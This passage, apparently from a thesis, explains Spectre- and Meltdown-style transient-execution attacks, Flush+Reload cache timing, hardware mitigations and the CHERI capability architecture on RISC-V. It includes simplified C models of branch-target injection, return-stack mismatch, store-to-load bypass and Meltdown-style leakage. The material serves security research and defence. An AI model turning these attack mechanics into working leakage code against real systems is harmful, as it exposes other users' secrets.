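    const btb_entry *e = &b->e[btb_index(pc)];
    if (!e->valid) return 0;
    *target = e->target;
    return 1;
}
```

In this model, calling btb_update for the jump at 0x1008 followed by btb_predict for the jump at 0x8 returns the target recorded by the first call, which corresponds to the injection and triggering phases.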

Spectre-RSB

Spectre-RSB attacks were discovered later than the original Spectre attacks

and aim to attack speculative execution involving the Return Stack Buffer [23,

24]. There exist multiple flavours of this attack that use subtleties of a

particular microarchitecture, but all have the same goal in common. Spectre-

RSB attacks target a mismatch between the address on the hardware return

stack and the address on the software return stack. The microprocessor will

use the address in the RSB and speculatively direct the control-flow there. The

attack consists of an injection phase, which changes the entry at the current

index of the RSB, and a side-channel sending phase, which triggers side effects

by speculatively returning to the injected address.
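
The mismatch between the hardware return stack and the software return stack can be sketched as follows. The depth of eight entries and the wrap-around behaviour are assumptions made for illustration; real RSB implementations differ in size and in how they handle underflow.

```c
#include <assert.h>
#include <stdint.h>

#define RSB_DEPTH 8u /* assumed depth */

typedef struct { uint64_t slot[RSB_DEPTH]; unsigned top; } rsb;

/* A call pushes its return address onto the hardware return stack. */
static void rsb_call(rsb *r, uint64_t return_addr) {
    r->slot[r->top % RSB_DEPTH] = return_addr;
    r->top++;
}

/* A return pops the most recent entry and uses it as the prediction. */
static uint64_t rsb_predict_return(rsb *r) {
    assert(r->top > 0);
    r->top--;
    return r->slot[r->top % RSB_DEPTH];
}

/* Returns 1 if the predicted address differs from the return address
   found on the software stack, i.e. if the instructions at the
   predicted address are executed transiently. */
static int return_mispredicted(rsb *r, uint64_t software_return_addr) {
    return rsb_predict_return(r) != software_return_addr;
}
```

If the return address on the software stack is changed between rsb_call and the return, return_mispredicted reports a mismatch; the model does not distinguish which of the two stacks was manipulated.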

Spectre-STL

Spectre-Store-To-Load (STL) differs substantially from the other Spectre

attacks as it does not attack control flow, but data flow. As described in Section

2.1.3, the microprocessor wants to execute load instructions as early as possible

to hide the load penalty. A load instruction can pass a store instruction if they

are independent. Load and store instructions are independent if their mem-

ory addresses differ. However, memory addresses might not be fully available

to the microprocessor when it needs to make the decision whether the load

is allowed to pass. Therefore, the microprocessor speculates whether the ad-

dresses are independent. Sophisticated processors have dedicated memory dis-

ambiguation logic for this purpose as described in Section 2.1.5. An example

of the attack is shown in Figure 2.4. The first step is to trick the microprocessor

into predicting that addr1 and addr2 are different although they in fact refer

to the same location. Then the load from addr2 will speculatively be executed

before the store to addr1. In the example, the store overwrites the memory at

this address with zeros, so the attacker can speculatively read out the stale

data before it is overwritten. This attack is also known as Spectre v4 and was

first demonstrated by Horn [25].

*addr1 = 0x00;

val = *addr2;

Figure 2.4: Spectre-STL example in C.
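
The ordering problem behind Figure 2.4 can be made explicit with a small model. It is a sketch only: the types machine and load_result and the function store_then_load are hypothetical, and the model assumes that the load is always predicted to be independent of the store.

```c
#include <assert.h>
#include <stdint.h>

#define MEM_BYTES 16u

typedef struct { uint8_t mem[MEM_BYTES]; } machine;

typedef struct {
    uint8_t transient_value; /* value seen by the speculative load */
    uint8_t committed_value; /* value the load finally commits */
    int     replayed;        /* 1 if a dependency was detected afterwards */
} load_result;

/* Models `*addr1 = store_value; val = *addr2;` when the load is
   predicted to be independent of the store. */
static load_result store_then_load(machine *m, unsigned addr1,
                                   uint8_t store_value, unsigned addr2) {
    assert(addr1 < MEM_BYTES && addr2 < MEM_BYTES);
    load_result r;
    /* The load bypasses the store whose address is still unresolved. */
    r.transient_value = m->mem[addr2];
    /* The store address resolves and the store is performed. */
    m->mem[addr1] = store_value;
    /* Disambiguation check: on aliasing the load is re-executed. */
    r.replayed = (addr1 == addr2);
    r.committed_value = m->mem[addr2];
    return r;
}
```

When both addresses are equal, transient_value holds the stale data while committed_value holds the stored value; instructions that consumed transient_value before the replay are the transient sequence of the attack.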

Rogue In-Flight Data Load

Rogue In-Flight Data Load (RIDL) [26] is an attack on microprocessors that

use Line Fill Buffers (LFBs). An LFB is used in microprocessors in order to

prevent caches from blocking when a miss occurs. In order to achieve high

performance goals, microprocessors speculatively use in-flight store data for

loads without checking permissions in the first step. A store is in flight when

it is currently in the LFB, but has not committed yet, e.g., due to a cache

miss. Another process running on the same hardware thread can observe this

in-flight store by performing a random load and leak its value through a side

channel. The general attack idea is as follows: A victim process performs a

memory access to secret data. This memory access will be handled via LFBs

and an entry holding the secret data will be allocated. Next, an attacker per-

forms a memory access, which will be speculatively satisfied by an LFB entry.

This returns the secret data to the attacker who uses it as an index to a buffer.

This will load a line into the caches and therefore reveals the secret value to

the attacker. Eventually, the processor will roll back the execution because of

misspeculation, but the effects to the cache will remain. With this attack, one

can leak entire pages from another running process.

2.2.2 Meltdown Attacks

Meltdown attacks focus on microarchitectural state changes due to transient

execution of instructions following a faulting instruction. Therefore, Melt-

down attacks do not attack branch prediction features of the microprocessor,

but out-of-order execution. They also depend on the point at which access rights are

checked and hardware exceptions are thrown.

Meltdown-US

The original Meltdown attack – demonstrated by Lipp et al. [27] – seeks to

access a page for supervisor use only from user space. Therefore, this attack

is also called Meltdown-US – User/Supervisor. The goal of the attack is to

read out supervisor-only memory without having a sufficient privilege level to

do so. The attack exploits that the protection domain privilege is not checked

when actually accessing the page, but in later pipeline stages. Eventually this

instruction will fault and raise a hardware exception, but in the meantime tran-

siently executed instructions following the faulting instruction will reveal the

sought value through side channels. By conducting this attack multiple times,

an attacker can read out the entire kernel of an operating system [27].
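
The effect of a late privilege check can be sketched with a strongly simplified model. The structure cpu_model, its probe array of 256 lines, and the two functions are hypothetical; the model only assumes that data is forwarded to dependent instructions before the check at commit and that cache state is not rolled back.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define PROBE_LINES 256u

typedef struct {
    uint8_t kernel_byte;              /* supervisor-only data */
    bool    line_cached[PROBE_LINES]; /* microarchitectural cache state */
} cpu_model;

/* Models a load of kernel_byte followed by a dependent load into a
   probe buffer. Returns true if the access faults at commit. */
static bool user_load_and_probe(cpu_model *cpu, bool user_mode) {
    assert(cpu != NULL);
    /* Execute stage: the value is forwarded before the check (assumed). */
    uint8_t value = cpu->kernel_byte;
    /* Transient dependent instruction brings one probe line into the cache. */
    cpu->line_cached[value] = true;
    /* Commit stage: the privilege check fails in user mode. Architectural
       results are discarded, the cache state is kept. */
    return user_mode;
}

/* Side-channel receiver: the index of the cached line equals the byte. */
static int recover_byte(const cpu_model *cpu) {
    for (unsigned i = 0; i < PROBE_LINES; i++) {
        if (cpu->line_cached[i]) return (int)i;
    }
    return -1;
}
```

Repeating the two steps for consecutive addresses corresponds to reading out a larger memory region byte by byte.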

Foreshadow Attacks

Van Bulck et al. presented Foreshadow [28], which has the same goal as

Meltdown-US – reading out data without having permission to do so. How-

ever, Foreshadow is targeting Intel SGX enclaves [29] and exploits a different

mechanism than Meltdown. Foreshadow is tailored to microprocessors that

do not allow large speculation windows and where the data to be leaked must

reside in the L1 cache. However, it is possible to access the L1 cache specula-

tively even though access is denied. This is caused by the fact that data access

and permission control are conducted in parallel in an exploitable microprocessor

[30]. Therefore, even though access is denied, the value is fetched into a

register and can be leaked through a side channel. Later, Weisse et al. [31]

presented Foreshadow-NG, which is an extension of Foreshadow that allows an attacker

to break operating system or hypervisor virtual memory abstractions.

Meltdown-GP

The GP – General Protection – variant of Meltdown enables an attacker to

access privileged system registers. When accessing a system register, the mi-

croprocessor will check whether the current privilege is sufficient to access it.

If this is not the case, an exception will be thrown. Meltdown-GP exploits that

some microarchitectures throw the exception late or allow computation on the

system register value before stopping executing the instruction sequence. This

allows the attacker to leak the system register’s value through a side channel.

This attack has erroneously been named Spectre v3a in early documents [32,

33].

Meltdown-RW

Meltdown-US demonstrated that supervisor memory can be read out without

sufficient privilege level. Kiriansky and Waldspurger [34] introduced a new

attack initially called Spectre v1.2. This attack seeks to write to pages that are

marked as read-only. The functioning of this attack is similar to Meltdown-

US. The attacker writes to the read-only page and other transient instructions

follow until the exception is thrown by the processor. The difference is that the

transient execution takes place in another process. The speculative write of one

process will trick another process into leaking secret information. Following Canella

et al. [19], this attack uses a transient-execution sequence after a faulting in-

struction. Therefore, it is referred to as Meltdown-RW – Read/Write.

2.2.3 Timing Side Channels

Measuring how long a certain instruction sequence needs to execute is a well-

known and often used side channel. The attacker measures the execution time

and compares it to a reference time. Based on that, the attacker decides which

information has been gained. Any sequence of instructions can be used for

timing measurements in theory, but in practice only instruction sequences

whose execution times differ significantly between runs are used. Often the

access time of load operations is taken. A load will commit earlier if it hits

a cache and therefore decreases the overall execution time. Otherwise, the load will have to go

to the DRAM and the execution time will be longer. Most transient-execution

attacks demonstrated up to now use the FLUSH+RELOAD [18] attack. Here,

the attacker flushes the Last Level Cache (LLC), which is shared between all

cores. Next, the victim will run and load at least one cache line based on the

secrets it computes on. After the victim has been executed, the attacker reloads

an entire buffer. If certain loads are faster than others, the attacker knows that

the victim has accessed the corresponding cache line of the load. This allows

the attacker to leak the secret value the victim computed on.
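
The final reload step can be sketched as a simple threshold decision over measured access times. The function name decode_reload and the threshold parameter are hypothetical; how the latencies are measured (for example with a cycle counter) and which threshold separates hits from misses depend on the platform and are not modelled here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the index of the first reloaded line whose latency is below
   hit_threshold, i.e. the line the victim is assumed to have accessed,
   or -1 if no line looks like a cache hit. */
static int decode_reload(const uint64_t *latency, size_t n,
                         uint64_t hit_threshold) {
    assert(latency != NULL);
    for (size_t i = 0; i < n; i++) {
        if (latency[i] < hit_threshold) return (int)i;
    }
    return -1;
}
```

If the victim indexes the buffer with a secret value, the returned index is that value. In practice the measurement is repeated several times to average out noise.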

2.3 Security Mechanisms

In order to mitigate transient-execution attacks, academia and industry have

come up with many security mechanisms. The first generation of security

mechanisms was on the software side as they could be easily and quickly de-

ployed. Next, many hardware mechanisms were proposed and implemented

in the following generation of microarchitectures. In this section, I summarise

the most important principles of hardware-based mitigation mechanisms. An-

other mitigation mechanism – SinglePCC – will be explained in Section 6.1.

2.3.1 Tagging Microarchitectural State

One class of mitigation mechanisms tags parts of the microarchitecture with

special values. Tagging parts of the microarchitecture prevents sharing mi-

croarchitectural state between protection domains that are not supposed to

share information with each other. For CHERI systems, the CHERI Compart-

ment Identifier (CID) is a tagging mitigation mechanism that has originally

been presented by Watson et al. [21]. A CID is an integer that uniquely iden-

tifies a compartment and is held in hardware. The idea is to add a field to

each BTB entry that is big enough to hold the CID. When a prediction is made

in the processor, the CID of the compartment currently running on the core

is compared to the respective entry of the BTB. If they match, the prediction

will be deemed trustworthy and the core will speculatively jump to the target.

Otherwise, the core will throw away the prediction results and will wait until

the jump target has been successfully resolved. Similar changes have to be

made for predictions coming from the RSB.
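
The CID check on a BTB entry can be sketched as follows. The entry layout, the 32-bit width of the CID field, and the function names are assumptions for illustration; the source only states that the field must be big enough to hold the CID.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical BTB entry extended with a compartment identifier. */
typedef struct {
    uint64_t target;
    uint32_t cid;   /* CID of the compartment that trained the entry */
    bool     valid;
} tagged_btb_entry;

/* Training records the CID of the currently running compartment. */
static void tagged_btb_train(tagged_btb_entry *e, uint32_t current_cid,
                             uint64_t target) {
    e->target = target;
    e->cid = current_cid;
    e->valid = true;
}

/* A prediction is only used if the stored CID matches the current one.
   Otherwise the core has to wait until the jump target is resolved. */
static bool tagged_btb_predict(const tagged_btb_entry *e, uint32_t current_cid,
                               uint64_t *target) {
    assert(target != NULL);
    if (!e->valid || e->cid != current_cid) return false;
    *target = e->target;
    return true;
}
```

An entry trained by one compartment is therefore ignored when another compartment executes a branch that maps to the same entry.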

The CID mechanism successfully stops attacks that attempt to cross protection

domains. A good example of an attack being mitigated is the attack on

sandboxes as it is described in Section 5.1.3. Tagging microarchitectural state

has also been adopted by industry, e.g., by Arm in the introduction of Arm

v8.5-A. The approach applied by Arm is to tag its microarchitecture and also

have special registers that either allow or disallow the use of branch prediction

results from one context in another context. This has been implemented in

multiple processors, for example, the Cortex-A77 [36].

2.3.2 Special Instructions

Another option to mitigate transient-execution attacks is to give the users con-

trol of how much they want to share with other compartments. This can be

done by changing the ISA and adding new instructions. This puts the user or

compiler in charge of what can be microarchitecturally visible to other com-

partments operating on the same system. The following paragraphs discuss

several instructions that could be added and what influence they have.

One option is to flush the caches or part of them. Whenever a context-

switch is conducted, the operating system can flush all caches. This will effectively

mitigate all attacks presented in Chapters 4 and 5 as the secret cannot

be recovered by timing measurements. Neither RISC-V nor CHERI-RISC-V

offers a flush instruction yet [11, 12, 37]. However, flushing does not solve the

problem of transient-execution attacks themselves as the transient-execution

sequence still happens – its effects are simply cleaned up. Attackers

may therefore be able to find another side channel and use it to recover the secret.

Moreover, the performance penalty of regularly clearing the caches is

prohibitive in a system.

Furthermore, it might be an option to add instructions to enable flushing

of microarchitectural state, e.g., flushing the branch prediction unit. This

effectively mitigates cross-protection-domain training and entry injection. However,

it does not prevent attacks in which a gadget found in the victim

domain reveals a secret. Another option is to disable

entire microarchitectural units. This implies performance penalties, but effectively

mitigates attacks through a specific microarchitectural unit. For example, Arm

allows memory disambiguation to be disabled completely, thereby preventing

Spectre-STL attacks [36]. Another class of instructions that is often used in

microarchitectures is barriers [33, 36]. Barriers – also called fences – do not

allow instructions being executed out-of-order or in speculation to pass them

and therefore enable software to make critical parts of its code secure. For ex-

ample, Arm introduces the Speculative Store Bypass Barrier that works by not

letting speculative loads pass previous stores to the same virtual address [36].

2.4 CHERI

Capability Hardware Enhanced RISC Instructions (CHERI) is a joint research

project of the University of Cambridge and SRI International. The CHERI

project has also been joined by Arm Limited who are developing a CHERI-

extended System-on-Chip called Morello using the ARMv8-A architecture as

the base ISA. The goal of the CHERI project is to enrich ISAs with additional

instructions that enable systems to have fine-grained memory protection and

compartmentalisation. CHERI can be divided into four parts: The abstract

model, the mapping of CHERI to a conventional ISA, the hardware imple-

mentation, and the software implementation. This section describes the key

points of the four parts of the CHERI project for RISC-V. CHERI is explained

more thoroughly in [37], which will be the main source unless stated other-

wise.

2.4.1 CHERI Abstract Model

The CHERI model itself is abstract – architecture neutral – and can in the-

ory be mapped to any concrete architecture. Therefore, CHERI extends an

architecture – referred to as the baseline architecture – rather than introduc-

ing a new architecture. The CHERI model is designed so that it composes

well with mechanisms already in contemporary systems. This includes Mem-

ory Management Units (MMUs), virtual memory in general, processor ring

models, and the exception hierarchy on the baseline ISA. The main concept of

CHERI is capabilities. Capabilities are tokens owned by a program that are

characterised by being unforgeable and delegatable. A capability authorises a

program to access a certain area of memory. CHERI follows two main design

principles. First, the designers want to enforce the principle of least privilege.

This principle, commonly used in the security world, says that a program should

only get the access and rights it needs for correct operation and not more. The second

principle is the principle of intentional use, which expresses that when a

choice to select a certain right from a pool of rights exists, this choice has al-

ways to be made explicit rather than implicit. The three main project goals

of CHERI are to provide fine-grained memory protection, software compartmentalisation,

and a viable transition path. A viable transition path means that

the transition from the conventional architecture to the CHERI variant of it

should be possible with a manageable effort. While the first two CHERI goals

are security goals, the latter one is a design goal as the designers assume that

CHERI will not be used in practice without being compatible with existing

systems.

CHERI uses this concept of capabilities and defines its own CHERI Capabilities

in order to fulfill its project goals. The key feature of CHERI is that

capabilities are not implemented in software, but in hardware. Capabilities

and instructions to modify them become part of the ISA. This includes a reg-

ister file for CHERI capabilities as they need more space than conventional

integer pointers. The CHERI model does not specify how these registers need

to be implemented. The implementation can differ from instantiation to in-

stantiation. The following text gives an incomplete list of registers defined by

CHERI:

General Purpose Capability Registers Their usage is comparable to gen-

eral purpose registers on conventional architectures. Code can freely

use general purpose capability registers for loading, storing, and manip-

ulating capabilities, but these registers can also hold non-capability data.

The architectural instantiation can decide how many general purpose ca-

pability registers are implemented. Also the concrete implementation

determines whether general purpose capability registers are an exten-

sion of the general purpose register file defined by the baseline ISA – a

merged capability register file – or whether the two register files should

be split.

Bits 63 to 0 per row:

Row 1: p (16 bits), otype (18 bits), bounds (27 bits)

Row 2: a (64 bits)

p: permissions, otype: object type, a: pointer address

Figure 2.5: Compressed CHERI Capabilities in Memory. Adapted from Watson et al. [37].

Program Counter Capability (PCC) This register extends the program counter

of conventional architectures so that the register holds capabilities in-

stead of integer pointers. Every instruction fetch is issued through the

PCC.

Default Data Capability (DDC) This register is used if code is not CHERI-

aware. All data loads and stores are issued through the DDC. CHERI-

aware code does not use the DDC, but more fine-grained capabilities

granted to the code running.

Others Depending on the baseline ISA more capability registers are available,

e.g., a register for storing the PCC during exception handling.

CHERI Capabilities aim to provide hardware-aided security for code pointers.

The following attributes are enforced on CHERI Capabilities and must

hold at any time.

Bounds The memory accessible by CHERI Capabilities is limited by bounds.

An access outside of the bounds is strictly forbidden.

Permissions The kinds of operations that are permitted on the accessible mem-

ory are limited by permissions. Like bounds, permissions are part of

CHERI Capabilities.

Monotonicity An operation can never add more privileges to a CHERI Ca-

pability, but only restrict these privileges.

Integrity and Provenance A CHERI Capability is always derived from an-

other valid CHERI Capability and it is ensured at any point of execution

that a corrupted CHERI Capability cannot be used as a reference.
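
The attributes listed above can be illustrated with a simplified software model. This is a sketch under assumptions, not the CHERI encoding: the struct cap stores uncompressed bounds, the permission bits are hypothetical, and a non-monotonic derivation is modelled by returning an untagged capability rather than by raising an exception.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical permission encodings. */
enum { PERM_LOAD = 1u << 0, PERM_STORE = 1u << 1, PERM_EXECUTE = 1u << 2 };

typedef struct {
    uint64_t base;   /* lowest accessible address */
    uint64_t length; /* number of accessible bytes */
    uint32_t perms;  /* permitted operations */
    bool     tag;    /* true only for a validly derived capability */
} cap;

/* Monotonicity and provenance: a derived capability is only tagged if
   its parent is tagged and it requests neither wider bounds nor
   additional permissions. */
static cap cap_restrict(cap parent, uint64_t base, uint64_t length,
                        uint32_t perms) {
    cap child = { base, length, perms, false };
    bool in_bounds = base >= parent.base && length <= parent.length &&
                     base - parent.base <= parent.length - length;
    bool fewer_perms = (perms & ~parent.perms) == 0;
    child.tag = parent.tag && in_bounds && fewer_perms;
    return child;
}

/* Bounds and permissions: checks an access of `size` bytes at `addr`. */
static bool cap_allows(cap c, uint64_t addr, uint64_t size, uint32_t perm) {
    assert(size > 0);
    if (!c.tag || (c.perms & perm) != perm) return false;
    if (addr < c.base || size > c.length) return false;
    return addr - c.base <= c.length - size;
}
```

Deriving a read-only capability for a 16-byte window from a larger read-write capability succeeds, while any attempt to widen that window again or to add the store permission yields an untagged result that cap_allows rejects.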

Figure 2.5 shows the format of 128-bit CHERI Capabilities in Memory.

This is the format used throughout this entire thesis work. CHERI Capabilities

contain the pointer address itself, the compressed bounds, the object type, and

the permissions. The bounds are compressed using the CHERI Concentrate

encoding [37, 38]. CHERI defines one-bit tags for capabilities that are held

both in capability registers and in memory. These tags protect the integrity

of capabilities and ensure that capabilities are always derived from a valid capability.

The tag bit is not shown in Figure 2.5. The exact bits of 128-bit capabilities

are more thoroughly discussed where appropriate for certain attacks in the

following chapters.

CHERI Capabilities – from now on referred to as capabilities – spread like

a tree during runtime. At the CPU start, capability registers hold root capabil-

ities that have all permissions set and can access the entire available memory

space. Code will monotonically refine root capabilities during runtime as de-

sired. Finally, a user-space program will be granted fine-grained capabilities

aligned to its needs. These capabilities are the leaves of the tree unless the

program decides to refine its capabilities again. The process of deriving capa-

bilities defines a chain of provenance.

Furthermore, CHERI allows sealing and unsealing of capabilities. A sealed

capability is non-dereferenceable and immutable, which means that sealed

capabilities cannot be manipulated and cannot be used for memory accesses.

Unsealing is only possible with a capability that grants sufficient rights to do so.

Sealed capabilities are used for two purposes in CHERI systems even though

more use cases are possible. First, they can be passed to untrusted code, e.g. to

serve as a token of authority. Second, sealed capabilities can be used for pro-

tection domain switching. In an object-oriented environment a sealed code

capability and a sealed data capability constitute the object’s code and its ac-

cessible data. An atomic operation unsealing both capabilities and jumping to

the code capability represents a protection domain switch.
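
Sealing and unsealing can be sketched with a small model. All names are hypothetical: the marker OTYPE_UNSEALED, the struct seal_auth that stands in for the authorising capability, and the rule that the authorising capability covers a range of object types are simplifications made for illustration and do not reproduce the CHERI encoding.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define OTYPE_UNSEALED UINT32_MAX /* hypothetical "not sealed" marker */

typedef struct { uint64_t base, length; uint32_t otype; bool tag; } cap;

/* Stand-in for the authorising capability: a range of object types
   plus the rights to seal and unseal with them. */
typedef struct { uint32_t first, last; bool permit_seal, permit_unseal; } seal_auth;

static bool cap_is_sealed(cap c) { return c.otype != OTYPE_UNSEALED; }

static bool cap_seal(cap *c, seal_auth a, uint32_t otype) {
    assert(otype != OTYPE_UNSEALED);
    if (!c->tag || cap_is_sealed(*c) || !a.permit_seal) return false;
    if (otype < a.first || otype > a.last) return false;
    c->otype = otype;
    return true;
}

static bool cap_unseal(cap *c, seal_auth a) {
    if (!c->tag || !cap_is_sealed(*c) || !a.permit_unseal) return false;
    if (c->otype < a.first || c->otype > a.last) return false;
    c->otype = OTYPE_UNSEALED;
    return true;
}

/* Sealed capabilities are non-dereferenceable ... */
static bool cap_can_dereference(cap c) { return c.tag && !cap_is_sealed(c); }

/* ... and immutable: shrinking the bounds is refused while sealed. */
static bool cap_set_length(cap *c, uint64_t length) {
    if (!c->tag || cap_is_sealed(*c) || length > c->length) return false;
    c->length = length;
    return true;
}
```

A sealed capability can thus be handed to untrusted code as a token: the holder can neither use nor modify it, and only a party with a matching authorising capability can unseal it.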

In order to comply with the principle of intentional use, CHERI extends the

baseline ISA with capability instructions. The operands of an instruction are always

explicit and cannot be interpreted dynamically, e.g. a load either

loads an integer pointer or a capability. CHERI provides the following classes

of instructions:

Extract Capability Fields The purpose of these instructions is to copy certain

fields of capabilities, e.g. the offset field, to a general purpose register

for inspection.

Move Capability The purpose of these instructions is to move a capability from

one capability register to another one without modifying the capability

itself.

Manipulate Capability These instructions allow fields of capabilities,

e.g. the offset field, to be changed monotonically.

Load and Store These instructions load or store data through a capability,

but this class also contains instructions that load or store

capabilities through another capability. The capability used for loading

or storing has to allow that access by being suitably configured.

Change Control-Flow CHERI offers jump and branch instructions. Whether

branches are taken or not depends on whether capability fields are set.

(Un)seal Capability These instructions seal or unseal a capability

using another authorising capability. This class of instructions also

contains protection domain switching.

Check Capability These instructions check whether capability fields match

expected values and throw an exception if this is not the case.

2.4.2 CHERI-RISC-V

CHERI-RISC-V [37] is the mapping of the abstract CHERI model to RISC-V.

As explained above, RISC-V is an ISA design space due to its modular design.

CHERI-RISC-V can therefore also be considered an ISA design space. A particular

instantiation of CHERI-RISC-V may choose to implement multiple options

described in the following paragraphs in a parameterisable way.

Both 32-bit and 64-bit RISC-V are extended for CHERI. The CHERI de-

signers also express the possibility of a 128-bit CHERI-RISC-V mapping when

RISC-V has evolved that far. The length of capabilities is 64 bits for 32-bit

CHERI-RISC-V and 128 bits for 64-bit CHERI-RISC-V not including the tag

bit.

CHERI-RISC-V describes both split and merged register files. The goal of

the CHERI project is to provide hardware that offers memory protection and

compartmentalisation for all kinds of application areas. In a merged register

file, a general purpose register has the width to hold a capability as well. A

merged register file helps to reduce the number of logic gates on a chip where

this is necessary, e.g., ISAs for embedded processors like RV32E. However,

the principle of intentional use has to be fulfilled. An access to a register must

never be ambiguous in the way its value is interpreted.

Besides the load and store instructions for bytes, half-words, words, and

double-words, CHERI-RISC-V also extends RISC-V with instructions that can

load and store floating point values through capabilities. Furthermore, CHERI-

RISC-V allows atomic operations to work with capabilities. Therefore, all

memory accesses in a CHERI-RISC-V system can be handled through capabilities if

this is desired by the program. CHERI-RISC-V also offers compressed CHERI

instructions. When executed in capability pointer mode, each implicit register

operand of the compressed instruction is expected to be the capability variant

of the corresponding register.

Furthermore, CHERI-RISC-V introduces Special Capability Registers

(SCRs) that extend conventional RISC-V registers, but also add new registers.

The purpose of SCRs is to enable exception handling with capabilities. They

extend {m,s,u}{tvec,epc,scratch} and add new data capabilities for each of the

three privilege levels for their respective memory areas. CHERI-RISC-V also

extends RISC-V CSRs for capability functioning. Last, CHERI-RISC-V enriches

RISC-V’s Page Table Entries (PTEs) such that there is one bit that specifies

whether capabilities may be stored to that page and one bit that specifies

whether capabilities may be loaded from that page.

2.4.3 CHERI-RISC-V Hardware

The CHERI project contains three RISC-V processors that have been extended

with CHERI instructions: Piccolo^1 is an in-order, 3-stage pipeline processor

that implements RV32ACIMUxCHERI, where xCHERI means that this processor

implements CHERI-RISC-V as well. Flute^2 is an in-order, 5-stage

pipeline processor that implements RV64ACDFIMSUxCHERI and supports

virtual memory as well. Toooba^3 is an out-of-order, deep, and superscalar processor

that implements RV64ACDFIMSUxCHERI and supports virtual memory.

2.4.4 CHERI Software Stack

There is a large software stack of programs that have been created especially

for CHERI systems or adapted for them. In this section, I describe the impor-

tant bits with respect to the work conducted in this thesis.

^1 available at https://github.com/CTSRD-CHERI/Piccolo

^2 available at https://github.com/CTSRD-CHERI/Flute

^3 available at https://github.com/CTSRD-CHERI/Toooba

CHERI-LLVM

The LLVM framework can be split into two parts: the front-ends and back-

ends. The main task of the front-ends is to parse the input files and generate

output that is used by the back-ends – the Intermediate Representation (IR).

LLVM supports multiple front-ends, e.g., clang in order to compile C/C++.

Furthermore, each target ISA has its own back-end that generates machine

code specific to that ISA. The CHERI project extended the clang front-end

generically for all supported ISAs such that pointers are represented by capa-

bilities instead of integer values. However, each back-end has to be tailored

for the particular underlying ISA, e.g. MIPS or RISC-V, in order to produce

the correct CHERI instructions needed. These changes constitute the CHERI-

LLVM framework^4. The CHERI-LLVM compiler framework also includes

other tools not needed for compiling in the first place, but that are helpful for

debugging, e.g., riscv64cheri-objdump.

Operating Systems

The CHERI software stack includes two operating systems that have been

adapted to run on a CHERI processor. CheriBSD^5 is a fork of FreeBSD and

receives the main research focus in OS research within the CHERI project.

CheriBSD provides CheriABI [39], which is an Application Binary Interface

such that applications that use CHERI can communicate with the kernel. The

kernel itself does not need to use capabilities internally, but can. The pure-capability CheriBSD kernel is currently a work in progress. CheriRTOS⁶ is

a fork of FreeRTOS and intended as a pure-capability system from the very

beginning [40].

2.4.5 CHERI Security Model

CHERI aims to implement two security principles: fine-grained memory pro-

tection and software compartmentalisation. These two principles need to be

guaranteed in all implementations – including in speculation and out-of-order

execution. Cache timing side channels as described in Section 2.2.3 are not

part of the security model. AMD likewise states that its architectures do not prevent cache timing side-channel attacks and argues that these attacks have to be prevented by software [41]. Arm states that timing side-channel

⁴ available at https://github.com/CTSRD-CHERI/llvm-project
⁵ available at https://github.com/CTSRD-CHERI/cheribsd
⁶ available at https://github.com/CTSRD-CHERI/cherios


attacks were not novel. However, timing side-channel attacks in connection with transient execution were previously not known [32]. CHERI does not guarantee the

absence of timing side channels, but should give guarantees about transient

execution. This means that transiently executed instructions should not lead

to any privilege escalation. An attacker should never have access to more ca-

pabilities than those granted by the architectural register state and the capabil-

ities reachable through those. Furthermore, CHERI-RISC-V systems should

follow the security model required by RISC-V, which includes separating the M, S, and U privilege modes and their access rights. Attacks can be divided into three classes according to their dependency on the victim:

Independent This class of attacks does not require any action or help from

the “victim”.

Exploitative This class of attacks requires the “victim” to unknowingly or

unwillingly cooperate with the attacker.

Collusion This class of attacks requires the “victim” to willingly collaborate

with the attacker.

It is expected that attackers are able to execute arbitrary code on a CHERI

system, e.g., a user limited to a sandbox who has turned into an attacker. An example of this could be JavaScript code pulled from the web when rendering a web page.

Therefore, an attacker is assumed to be able to attempt independent attacks.

Meltdown-style attacks – as explained in Section 2.2.2 – are typical indepen-

dent attacks. It is further expected that the entire CHERI system should be safe

in the presence of such an attacker even in the case of instructions only being

executed transiently. Furthermore, a CHERI system has to expect that an at-

tacker will attempt exploitative attacks by trying to get the unwitting help of

other code running on the system and having access to powerful capabilities.

Spectre-style attacks – as explained in Section 2.2.1 – are typical exploitative

attacks. For CHERI implementations, any willing collaboration from the vic-

tim side is not expected, which excludes the class of collusion attacks from the

security model used in this thesis work.

2.5 Related Work

Woodruff et al. [21] discussed the applicability of Spectre-PHT, Spectre-BTB,

and Meltdown-US on CHERI systems. They clearly state that capability fields must not be subject to speculation, but all CHERI checks have to be finished


successfully before accessing memory. Otherwise the protection mechanisms

of CHERI are likely to be bypassed. They are especially concerned about

cross protection domain attacks on CHERI systems. Therefore, they propose

the introduction of a CID that specifies when microarchitectural state may be

shared with other protection domains.

Gonzalez et al. [42] were the first ones to demonstrate speculative execu-

tion attacks on a RISC-V processor. They successfully reproduced Spectre-

PHT and Spectre-BTB on the Berkeley Out-of-Order Machine (BOOM) [43],

but no other speculative attacks. Furthermore, they did not attempt to conduct

Meltdown-style transient-execution attacks. However, Gonzalez et al. stated

the theoretical feasibility of the remaining transient-execution attacks, which

is proved in my work. Similar work on the BOOM processor has been done

by Le et al. [44].

There has been more work conducted on other comparable RISC archi-

tectures. Arm has summarised and explained the most impactful transient-

execution attacks and explained how they would be conducted on an Arm

microarchitecture [32]. Furthermore, Arm has evaluated which of its mi-

croarchitectures are vulnerable to which attack [45]. The covered attacks are

Spectre-PHT, Spectre-BTB, Spectre-RSB, Spectre-STL, Meltdown-US, and

Meltdown-GP – the attack names used by Arm do not follow the naming

scheme of this work though. Arm clearly states that all unlisted microarchitectures are not vulnerable to any transient-execution attack. None of the listed microarchitectures is vulnerable to all attacks; each is vulnerable only to a subset. However, Spectre-PHT was classified as successful on all listed microarchitectures. Moreover, each attack could be reproduced on at least one of Arm’s

microarchitectures. As stated by Canella et al. [19], Arm’s processors are

only vulnerable to a subset of Meltdown-style attacks that Intel’s and AMD’s

processors are vulnerable to. Many Meltdown-style attacks are tailored to the

x86_64 architecture and special features of various implementations of it. Nei-

ther Arm’s ISA nor RISC-V have the necessary features and therefore no im-

plementation is vulnerable to this subset of Meltdown-style attacks. Due to

the similarity in the architectural style, Arm’s summary of attacks also sets the

